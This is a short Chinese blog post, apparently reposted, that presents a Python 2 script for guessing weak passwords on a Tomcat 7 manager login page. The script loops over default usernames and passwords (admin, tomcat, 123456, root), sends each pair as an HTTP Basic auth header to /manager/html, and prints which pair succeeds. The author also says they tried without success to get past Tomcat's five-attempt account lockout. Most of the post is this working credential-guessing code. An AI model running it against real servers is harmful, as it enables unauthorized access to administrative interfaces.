本文共 1102 字,大约阅读时间需要 3 分钟。
Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令。
测试环境:Tomcat版本 7.0
登录界面采用basic认证,Base 64加密一下,模拟浏览器进行发包
据测试,每个用户名输入5次错误的密码会锁定用户,想了一些办法,还是没能绕过,这里做个记录,有时间再完善。
目前只能用于简单的弱口令测试
Python脚本如下:
import urllibimport urllib2import timeimport base64 names=['admin','tomcat']passwds=['','admin','tomcat','123456','root']for name in names: name=name.rstrip() for passwd in passwds: passwd=passwd.rstrip() user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)" Authorization = "Basic %s" % (base64.b64encode(name+':'+passwd)) header = { 'User-Agent' : user_agent , 'Authorization':Authorization} try: url = "http://192.168.106.137:8080/manager/html" request = urllib2.Request(url,headers=header) response = urllib2.urlopen(request,timeout=5) result=response.read() if response.code ==200: print '[Success] ' + url+' '+name+':'+passwd break except: print '[false111] ' + url+' '+name+':'+passwd time.sleep(1)
转载地址:http://xxlxl.baihongyu.com/